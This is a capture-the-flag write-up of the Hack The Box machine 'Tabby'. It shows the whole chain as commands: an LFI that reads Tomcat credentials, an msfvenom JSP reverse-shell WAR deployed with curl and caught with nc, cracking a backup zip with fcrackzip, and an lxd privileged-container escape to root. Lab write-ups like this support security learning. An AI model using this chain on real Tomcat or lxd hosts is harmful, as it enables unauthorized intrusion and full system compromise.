Edit: Because of new server the image files for this article are missing.
Enumeration
First I started with the enumeration of the box. A simple nmap scan with a command gave me the result:
nmap -T4 -p- -A 10.10.10.194Initial Foothold:
From the nmap results we can see that there are 3 ports open: 22, 80, 8080. We can also see that on port 8080 there is a Tomcat server running.
The website on port 80:
The website on port 8080:
After clicking on all the links on the port 80 website I found something interesting.
From here you need to do some steps. First add megahosting.htb to the /etc/hosts
After that is done we can see that we have the possibility for LFI. I ususally try to see if I can see the passwd file. In this case YES.
Ok lets search for RCE now. We need a way in (reverse shell). The website on port 8080 uses tomcat so I start googling how to exploit that with LFI. Also on this page we can see some admin portals. If you are interested please check the link: https://askubuntu.com/questions/135824/what-is-the-tomcat-installation-directory
Otherwise you can copy paste the code bellow in your url bar.
view-source:http://megahosting.htb/news.php?file=../../../../../../../../../usr/share/tomcat9/etc/tomcat-users.xmlHow about that? Look at what we have found. Username and Password.
Now it is time to figure out how to exploit that when we have user and pass. I guess that there are several ways to do it but my original thought was with a msfvenom payload.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=YOUR_IP LPORT=PORT -f war > shell.warThis will give you a shall file that will call your machine when executed. If you want to learn more about shell please read THIS.
Ok so what now. Lets see what we have and what we need to do. We have user and password, we have a payload that will call our machine and give us a shell. Whats left is to upload it and deploy it.
Upload the shell:
curl -u 'tomcat':'$3cureP4s5w0rd123!' -T shell.war 'http://10.10.10.194:8080/manager/text/deploy?path=/payloadshell'List Deployed shell
curl -u 'tomcat':'$3cureP4s5w0rd123!' http://10.10.10.194:8080/manager/text/listBefore we execute the shell we need to start a nc listener on our machine. Use the command bellow with PORT (the one you choose in the payload:
nc -nvlp PORTExecute the shell
curl -u 'tomcat':'$3cureP4s5w0rd123!' http://10.10.10.194:8080/payloadshell/User:
Ok we have the shell now. We can check which user we are and in this case we are tomcat. Lets get a better shell by using:
python3 -c 'import pty; pty.spawn("/bin/bash")'After some browsing the only interesting thing I found was a backup file in zip format. Download that to your local machine and use:
fcrackzip -D -p rockyou.txt 16162020_backup.zipThe result will be:
Now we can switch users follow the screen bellow:
After switching users we can locate the user flag which is located in /home/ash.
CONGRATS YOU HAVE USER.
If you get stuck join our Discord. Even if you are not stuck join and chat with like minded people.
ROOT:
If you take a look at the image above you will notice something called lxd (Linux Daemon). I start googling about this and see what we can do with it. If you want to read about it I will link an article that was really interesting at least to me. Follow the article or I will just paste the commands bellow. (they are my commands so you need to see if you will get the same extensions)
On your local machine:
git clone https://github.com/saghul/lxd-alpine-builder.gitcd lxd-alpine-buildersudo su./build-airplaneRemote (Tabby) machine – in ash directory:
wget 10.10.14.3/alpine-v3.12-x86_64-20200804_1115.tar.gzlxc image import ./alpine-v3.12-x86_64-20200804_1115.tar.gz --alias myimagelxc image listlxc init myimage ethicalhacs -c security.privileged=truelxc config device add ethicalhacs mydevice disk source=/ path=/mnt/root recursive=truelxc start ethicalhacslxc exec ethicalhacs /bin/shcd /mnt/root/rootIn that folder you will be able to find the root.txt
I hope you liked the write up. The root step is without so many images so leave me a comment if you don’t understand something. I will make a video on it probably.
